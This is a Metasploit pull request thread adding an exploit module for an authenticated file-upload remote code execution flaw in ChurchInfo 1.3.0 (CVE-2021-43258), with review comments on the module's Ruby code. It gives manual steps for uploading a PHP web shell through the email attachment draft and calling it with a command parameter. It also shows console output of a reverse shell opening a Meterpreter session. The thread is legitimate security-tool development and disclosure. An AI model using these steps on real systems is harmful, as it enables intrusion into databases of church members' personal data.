Adding exploit for ChurchInfo 1.3.0 (CVE-2021-43258)
rapid7/metasploit-framework pull request #17257
Opened 2022-11-13 03:19 UTC by m4lwhere

ChurchInfo is a PHP application used to help Churches manage systems and users as an opensource project. There are various vulnerabilities in the ChurchInfo 1.3.0 software which can be exploited by an attacker, this module targets an authenticated remote code execution (RCE) vulnerability.

ChurchInfo 1.3.0 has functionality to email users from the database with attachments. When preparing the email, the attachment draft is saved in the `/churchinfo/tmp_attach/` folder. Before the email is sent, the file put into the attachment can be loaded in the application. RCE exists when uploading malicious PHP as an attachment.

This vulnerability was assigned CVE-2021-43258.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Within `msfconsole`, use the `exploits/multi/http/churchinfo_upload_exec` module.
- [ ] Set the target `RHOST`, `APPBASE`, `username`, and `password` values. 
- [ ] Tested and works properly against the application, this was reported to the ChurchInfo developers last year.
- [ ] This exploit only affects the PHP application to perform a Remote Code Execution.

## How it Works:
There is a draft email function within the application which allows users to upload attachments. Before the attachments are sent, they are stored in a directory named `/tmp_attach` as a direct file. This allows malicious PHP files to be uploaded and executed by the PHP engine used by the application.

Successful exploitation will appear with a similar output as below:
```
msf6 exploit(multi/http/churchinfo_upload_exec) > run

[*] Started reverse TCP handler on 192.168.1.240:4444
[+] Logged into application as admin
[*] Navigating to add items to cart
[+] Items in Cart: 3
[+] Uploading exploit via Email temp email attachment
[+] Exploit uploaded to /churchinfo/tmp_attach/FjuIxnXKe.php
[!] Don't forget to clean up artifacts at /churchinfo/tmp_attach/FjuIxnXKe.php
[*] Sending stage (39927 bytes) to 192.168.1.72
[*] Meterpreter session 2 opened (192.168.1.240:4444 -> 192.168.1.72:37250) at 2022-11-12 21:38:30 -0500

meterpreter >
```

### Manual Exploitation Steps:

1. Log into the ChurchInfo application 
2. Browse to the `SelectList.php` page and click the "Add to Cart" button
3. Browse to `CartView.php` and click "Compose Email"
4. Attach a PHP shell as the "attach file", place anything in the subject and message, click "Save Email"
5. Navigate to `http://127.0.0.1/churchinfo/tmp_attach/exploit.php?cmd=pwd`
6. Any PHP code is executed

Please let me know if any additional information is needed, I've read through the contribution documentation and believe that I've been able to meet all requirements.

2022-11-14 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +        OptString.new('APPBASE', [true, 'The location of the ChurchInfo app', '/churchinfo/']),
This should be `TARGETURI` and the other instances will need to be updated.
```suggestion
        OptString.new('TARGETURI', [true, 'The location of the ChurchInfo app', '/churchinfo/']),
```

2022-11-14 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    if res && res.code != 302
You probably want `unless res && res.code == 302`. If `res` is nil because the request failed, then this will continue on to say that it was logged in.
```suggestion
    unless res && res.code == 302
```

2022-11-14 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    if res && res.code != 200
Same thing here
```suggestion
    unless res && res.code == 200
```

2022-11-14 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +      login_page = datastore['APPBASE'] + 'Default.php?Proto=https&Path=' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '%2F' + datastore['APPBASE']
Once APPBASE is renamed TARGETURI, you shouldn't need to prepend all of the paths with it. Also these parameters would be better placed in the `vars_get` of the request down below, especially since the page (`Default.php`) and path parameters are the same.

2022-11-14 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    print_warning("Don't forget to clean up artifacts at #{exploit_uri}")
You probably mean to register those files for cleanup. If you can't register them to be cleaned up automatically, then you can remove the `FileDropper` mixin and the meterpreter compatibility command in the module info.

2022-11-15 02:01 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +      login_page = datastore['APPBASE'] + 'Default.php?Proto=https&Path=' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '%2F' + datastore['APPBASE']
Completed in most recent commit, I was unaware of the `TARGETURI` which is certainly easier to manage. The path parameters have been added to a `vars_get` as well.

2022-11-15 02:03 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    print_warning("Don't forget to clean up artifacts at #{exploit_uri}")
Added the `register_file_for_cleanup` to the exploit in most recent commit, I was unaware this was a usable function which is really neat. Thanks!

2022-11-15 02:05 UTC, m4lwhere commented
This should cover all of the comments, thanks for the feedback. My most recent commit has also added a check to make sure the exploit was uploaded properly to the sever. Previously it was attempting the upload then blindly trying to execute it.

2022-11-16 22:10 UTC, gwillcox-r7 requested changes

2022-11-17 14:53 UTC, jmartin-r7 reviewed
Looks great, a couple more ideas for adjustment that may make this code a bit simpler.

2022-11-17 14:53 UTC, jmartin-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +          }
This is not be required, the Filedropper mixin add this for you.

2022-11-17 14:53 UTC, jmartin-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +          execution as the XXX user can be achieved.
Is `XXX` a defined user or was this expected to be updated?  Is this run in the context of the `web server` account maybe?  Please also update the `md` file if this does need to change.

2022-11-17 14:53 UTC, jmartin-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +        OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']),
Is `churchinfoadmin` a default password for the `admin` user?  If not please remove the value to ensure users set the option before attempting to run the module.

2022-11-17 14:53 UTC, jmartin-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    vprint_good("PHP session cookie is #{cookie}")
You can avoid needing to extract and pass the cookie yourself by using the `keep_cookies` option:
https://github.com/rapid7/metasploit-framework/blob/dcb42da2697cbcee910bc868eec7427c2a3e8aee/lib/msf/core/exploit/remote/http/moodle/login.rb#L19-L24

2022-11-17 14:53 UTC, jmartin-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +      'cookie' => cookie,
```suggestion
```

Not needed if using `keep_cookies`.

2022-11-18 11:00 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +        OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']),
Correct, these are the default username and password values from the documentation. I've updated the `md` file to reflect this as well

2022-11-18 11:44 UTC, m4lwhere commented on documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
> +If there are no persons in the database, the exploit will fail. To help troubleshoot, enable verbose mode with the following:
Added!

2022-11-18 11:45 UTC, m4lwhere commented on documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
> +meterpreter >
Added this to all instances with module output

2022-11-18 11:55 UTC, m4lwhere commented on documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
> +msf6 exploit(multi/http/churchinfo_upload_exec) > run
Added the `show options` as well

2022-11-18 11:56 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +        'DisclosureDate' => '2021-10-30',
Correct, this was the day it was disclosed to the ChurchInfo developers. This has been added as a comment inline

2022-11-18 11:56 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    vprint_status('Attempting login')
Received, thanks for the input. Added a check and I've implemented the `cookie_jar`

2022-11-18 11:57 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    unless res && res.code == 302
Added a check for the `Location` header within here as well

2022-11-18 11:57 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +        'grouptype' => '',
These were not required and removed, exploit works fine without these additional parameters

2022-11-18 11:59 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    /Items in Cart: (?<cart>\d)/ =~ res.body
Added another check here as well, thanks!

2022-11-18 11:59 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +          execution as the XXX user can be achieved.
This was from the changes @gwillcox-r7 added in his comments, I've updated this in the latest version of code

2022-11-18 12:01 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    vprint_good("PHP session cookie is #{cookie}")
Very cool, I was unaware of this option and have enabled it. Thanks for the heads up! I've intentionally left the code to verbose print the PHP session value to help with any troubleshooting, but properly access the `cookie_jar` in future requests.

2022-11-18 12:02 UTC, m4lwhere commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +      'cookie' => cookie,
Received and implemented

2022-11-18 12:05 UTC, m4lwhere commented
Implemented all of the latest comments, thank you for all of the info! I've run `rubocop` and `msftidy` as well.

2022-11-18 17:24 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
> +msf6 exploit(multi/http/churchinfo_upload_exec) > run
@m4lwhere Don't know if this was in a commit you didn't upload but I'm not seeing this in the latest edition of this code?

2022-11-18 17:28 UTC, gwillcox-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    vprint_status('Attempting login')
The update is better however it still doesn't make sure the server is actually a ChurchInfo login page. It just checks that the server returns a 200 OK response to a `Default.php` page under the web root.

2022-11-18 18:51 UTC, gwillcox-r7 commented
Another idea for a check method is to grab `Update1_2_14To1_3_0.php`. If that file exists then we are on version 1.3.0 of the target server. If we get 404's or anything other than a 200 OK then we know we are not targeting 1.3.0 of ChurchInfo.

2022-11-18 19:31 UTC, gwillcox-r7 commented
So another thing I noticed. This bug doesn't just exist in 1.3.0. It also exists in 1.2.14 and 1.2.13 from what I can tell. Versions prior to this did not have the `tmp_attach` folder and do not contain the vulnerable upload code.

2022-11-18 19:46 UTC, gwillcox-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    vprint_status('Attempting login')
Will resolve this in an upcoming commit.

2022-11-18 19:47 UTC, gwillcox-r7 commented on modules/exploits/multi/http/churchinfo_upload_exec.rb
> +    if cart.to_i < 1
Will resolve this in the upcoming commit.

2022-11-18 19:50 UTC, gwillcox-r7 commented
Added in a `check` method to allow the module to check if the target is vulnerable and then also used `prepend Msf::Exploit::Remote::AutoCheck` to make sure this is always run before exploiting to prevent exploitation if the target is not vulnerable. Users can override this if needed though.

2022-11-19 00:47 UTC, gwillcox-r7 approved these changes

2022-11-19 01:04 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added for CVE-2021-43258 which exploits a flaw whereby, when emailing users in the ChurchInfo database with attachments, the uploaded file is hosted in a web accessible location under the ChurchInfo web root before the email is sent. An authenticated attacker can abuse this to gain RCE as the `www-user` user.

2022-11-19 01:28 UTC, merged